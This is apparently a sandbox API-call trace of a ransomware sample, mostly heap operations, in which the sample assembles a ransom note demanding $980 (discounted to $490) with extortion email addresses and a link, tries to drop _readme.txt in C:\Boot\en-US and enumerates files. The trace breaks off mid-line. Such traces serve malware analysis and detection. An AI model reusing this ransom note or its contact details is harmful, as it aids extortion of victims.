[0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.465] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0227.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.465] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.465] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.465] PathFindFileNameW (pszPath="") returned="" [0227.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.465] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.466] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.466] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.466] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.466] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0227.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.467] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0227.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.468] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.469] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.469] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.469] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.469] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.469] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.470] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.470] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.470] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0227.470] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0227.470] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.470] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.471] 